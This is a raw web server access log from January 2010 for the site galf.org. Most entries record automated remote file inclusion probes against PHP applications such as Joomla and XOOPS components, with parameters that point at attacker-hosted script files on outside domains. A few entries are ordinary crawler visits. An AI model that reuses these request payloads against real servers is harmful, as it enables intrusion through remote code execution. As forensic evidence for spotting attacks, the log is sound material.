74.223.143.131 - - [17/Jan/2010:21:46:35 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:46:36 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:46:52 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:47:19 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:47:19 -0800] "GET /logs/access_090907.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:47:19 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:47:23 -0800] "GET /logs/access_091207.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:47:37 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:47:38 -0800] "GET /logs/access_090907.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:47:39 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:47:39 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:47:39 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:47:39 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:21:47:42 -0800] "GET /logs/access_091207.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:48:16 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:48:21 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://acolmi.org/images/save.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:21:48:29 -0800] "GET /logs/access_090803.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.42.184 - - [17/Jan/2010:21:53:27 -0800] "GET /logs/access_090720.log/index.php?principal=http://ecgt-gsp.com/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
189.19.42.184 - - [17/Jan/2010:21:53:27 -0800] "GET /logs/index.php?principal=http://ecgt-gsp.com/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
189.19.42.184 - - [17/Jan/2010:21:53:40 -0800] "GET /index.php?principal=http://ecgt-gsp.com/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
65.55.207.102 - - [17/Jan/2010:21:57:38 -0800] "GET /?D=D HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:21:59:13 -0800] "GET /?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:21:59:13 -0800] "GET /logs/?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:21:59:13 -0800] "GET /logs/access_091012.log%20%20/?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:21:59:14 -0800] "GET /logs/access_091012.log%20%20/?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:21:59:14 -0800] "GET /logs/?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
207.58.163.53 - - [17/Jan/2010:21:59:15 -0800] "GET /?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:22:00:06 -0800] "GET //?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:22:00:07 -0800] "GET /logs/access.log///?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:22:00:07 -0800] "GET /logs///?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.40 - - [17/Jan/2010:22:06:13 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CCTB 1.2; .NET CLR 1.1.4322)" "galf.org"
72.34.235.197 - - [17/Jan/2010:22:07:07 -0800] "GET //?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:22:07:09 -0800] "GET /logs///?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:22:07:12 -0800] "GET /logs/access.log%20%20///?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:30 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:30 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:30 -0800] "GET /logs/access_091123.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:38 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:39 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:39 -0800] "GET /logs/access_090907.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:39 -0800] "GET /logs/access_091123.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:22:07:43 -0800] "GET //?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:22:07:44 -0800] "GET /logs///?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:22:07:45 -0800] "GET /logs/access.log///?board_skin_path=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:46 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:46 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:46 -0800] "GET /logs/access_091123.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:48 -0800] "GET /logs/access_090907.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [17/Jan/2010:22:07:58 -0800] "GET /logs/access_090907.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:22:09:51 -0800] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:22:09:51 -0800] "GET /logs/access_091214.log%20%20//bemarket/postscript/postscript.php?p_mode=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:22:09:51 -0800] "GET /bemarket/postscript/postscript.php?p_mode=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:22:09:55 -0800] "GET /logs/access_091123.log%20%20//bemarket/postscript/postscript.php?p_mode=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:22:10:31 -0800] "GET /bemarket/postscript/postscript.php?p_mode=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:22:10:31 -0800] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:22:10:31 -0800] "GET /logs/access_091214.log//bemarket/postscript/postscript.php?p_mode=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.192.120.211 - - [17/Jan/2010:22:10:37 -0800] "GET /logs/access_091123.log//bemarket/postscript/postscript.php?p_mode=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.129.119.11 - - [17/Jan/2010:22:18:16 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "galf.org"
69.175.59.90 - - [17/Jan/2010:22:19:16 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:22:19:30 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:22:19:30 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:22:19:30 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:19:37 -0800] "GET /logs/home.php?pagina=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:19:37 -0800] "GET /home.php?pagina=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:19:37 -0800] "GET /logs/access_090629.log%20%20/home.php?pagina=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:19:38 -0800] "GET /logs/access_090928.log%20%20/home.php?pagina=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:19:42 -0800] "GET /home.php?pagina=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:19:43 -0800] "GET /logs/access_090629.log%20%20/home.php?pagina=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:19:43 -0800] "GET /logs/home.php?pagina=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:22:19:47 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:22:19:47 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:22:19:47 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:22:19:47 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:22:19:49 -0800] "GET /logs/access_090928.log%20%20/home.php?pagina=http://loja.astrofoto.com.pt/components/com_putek/news/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:22:20:14 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:22:20:14 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:22:20:37 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [17/Jan/2010:22:20:37 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:53 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:56 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:56 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:56 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:56 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:58 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:58 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:58 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:58 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:59 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:59 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:59 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:59 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:59 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:59 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:59 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:20:59 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:21:02 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:21:02 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:21:02 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:21:02 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:21:04 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:21:04 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:21:04 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:22:21:34 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:22:21:52 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:22:21:52 -0800] "GET /logs/access_090921.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [17/Jan/2010:22:21:52 -0800] "GET /logs/access_090907.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:22:22:01 -0800] "GET /logs/access_090629.log/home.php?pagina=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:22:22:01 -0800] "GET /home.php?pagina=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:01 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.6.189.153 - - [17/Jan/2010:22:22:01 -0800] "GET /logs/home.php?pagina=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:02 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:03 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:03 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:05 -0800] "GET /logs/access_090921.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:05 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [17/Jan/2010:22:22:05 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:22:22:06 -0800] "GET /logs/access_090907.log/joomla/index.php?option=com_restaurante&task=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
